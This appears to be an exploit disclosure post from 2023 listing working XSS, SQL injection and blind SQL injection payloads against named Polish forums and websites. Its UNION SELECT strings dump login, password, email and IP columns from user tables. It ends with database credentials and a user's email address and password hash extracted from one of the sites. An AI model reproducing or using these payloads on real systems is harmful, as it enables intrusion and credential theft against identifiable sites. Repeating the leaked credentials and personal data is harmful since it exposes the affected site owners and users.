.__ .__ .__ __ ____ __ __| | | | _____|__|/ |_ ____ / \| | \ | | | / ___/ \ __\/ __ \ | | \ | / |_| |__\___ \| || | \ ___/ |___| /____/|____/____/____ >__||__| \___ > \/ \/ \/nullsite.alterivsta.org #Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*) #Web Site Creator => ??? #Dork => ???* #CMS => unknows forums,phpbb,invision power board #Vulnz => XSS/Blind SQLi/SQLi #Date => 14/04/2023 *PoC* [code] ----------------------------------------------------------------------------#1 www.sportowyvulcan.pl/forum.php?sort=a%'>">\> | <=[*XSS*] -------------------------------------------------------------------------------#2 http://www.duchmaszyny.pl/forum.php?sel=4%'>">\> | <=[*XSS*] ------------------------------------------------------------------------------- .............................................................................................................#3 http://www.hudak.pl/forum.php?akcja=czytaj&id=-9756 union all select 1,2,login,pass,5,6,7,8,9 FROM users-- | http://www.hudak.pl/forum.php?akcja=czytaj&id=-9756 union all select 1,2,login,passwd,5,6,7,8,9 FROM z_user--| <=[*SQLi*] http://www.hudak.pl/forum.php?akcja=czytaj&id=-9756 union all select 1,2,email,ip,5,6,7,8,9 FROM forum-- | .............................................................................................................| _________________________________________________________________________________________________________________#4 https://www.psychologia.net.pl/forum.php?level=467187&post=467187&sortuj='>\>">0&cale= | <=[*XSS*] _________________________________________________________________________________________________________________| ________ ___ ___ ________ ________ ________ |\ __ \|\ \|\ \|\ __ \|\ __ \|\ __ \ \ \ \|\ \ \ \\\ \ \ \|\ \ \ \|\ /\ \ \|\ /_ \ \ ____\ \ __ \ \ ____\ \ __ \ \ __ \ \ \ \___|\ \ \ \ \ \ \___|\ \ \|\ \ \ \|\ \ \ \__\ \ \__\ \__\ \__\ \ \_______\ \_______\ \|__| \|__|\|__|\|__| \|_______|\|_______|Special __________________________________________________#5 #Dork: Powered by PhPBB © 2001, 2002 phpBB Group* |______________________________________________ https://www.toczen.pl/forum/viewtopic.php?t=3294&start=-90 ;phpbb 2001/2002 unknow??? | <=[*SQLi*] ------------------------------------------------------------------------------------------------- ___ ________ ________ |\ \|\ __ \|\ __ \ \ \ \ \ \|\ \ \ \|\ /_ \ \ \ \ ____\ \ __ \ \ \ \ \ \___|\ \ \|\ \ \ \__\ \__\ \ \_______\ \|__|\|__| \|_______|Special ______________________________________________________________________________#6 https://www.maluchy.pl/forum/index.php?showtopic=98393*'*&st=20&gopid=9236485 | <= [*Blind SQLi*] ;Powered By IP.Board ------------------------------------------------------------------------------ #error:| -------------------------------------------------------------------------------------------------------------------------------------------?? IPB WARNING [2] mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given (Line: 444 of /sources/classes/class_display.php) | IPB WARNING [2] mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given (Line: 460 of /sources/classes/class_display.php) | -------------------------------------------------------------------------------------------------------------------------------------------- ___________________________________________________#7 http://m.www.siatkowka.wrzesnia.pl/forum.php?id=-1 | <= [*Blind SQLi*] ___________________________________________________| ----------------------------------------------------------------------------------#8 .first register account | http://travel4u.pl/forum_nowy_temat.php? | | <= [*Persistent XSS*] parameter "Temat" is bugged! insert -> '>">\> and post! | ---------------------------------------------------------------------------------- #Extra [*SQLi*] => ------------------------------------------------------------------------------------------------------------------------------------------------------- https://neurologia-dziecieca.pl/nd00.php?id=186 union all select 1,2,3,4,login,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM users-- | ------------------------------------------------------------------------------------------------------------------------------------------------------- #DB name 1 => ptnd_ptnd | user:ic033uc | password:uqu04d | ------------------------ ...................... #DB name 2 => ptnd_wp | ...................... #tables: | ------------------------------------------------------------------------------------ wp_commentmeta | wp_comments | wp_links | wp_options | wp_postmeta | wp_posts | wp_term_relationships | wp_term_taxonomy | wp_termmeta | wp_terms | wp_usermeta | wp_users => #Extrapolated: msow@wp.plmarek-ptnd$P$BLf1j7Tnpe9zR2AjSSmjLkRn3RJyiZ0 | ------------------------------------------------------------------------------------ [/code] ._________. */ ///______I ) . /_(_) /__/*PoC End*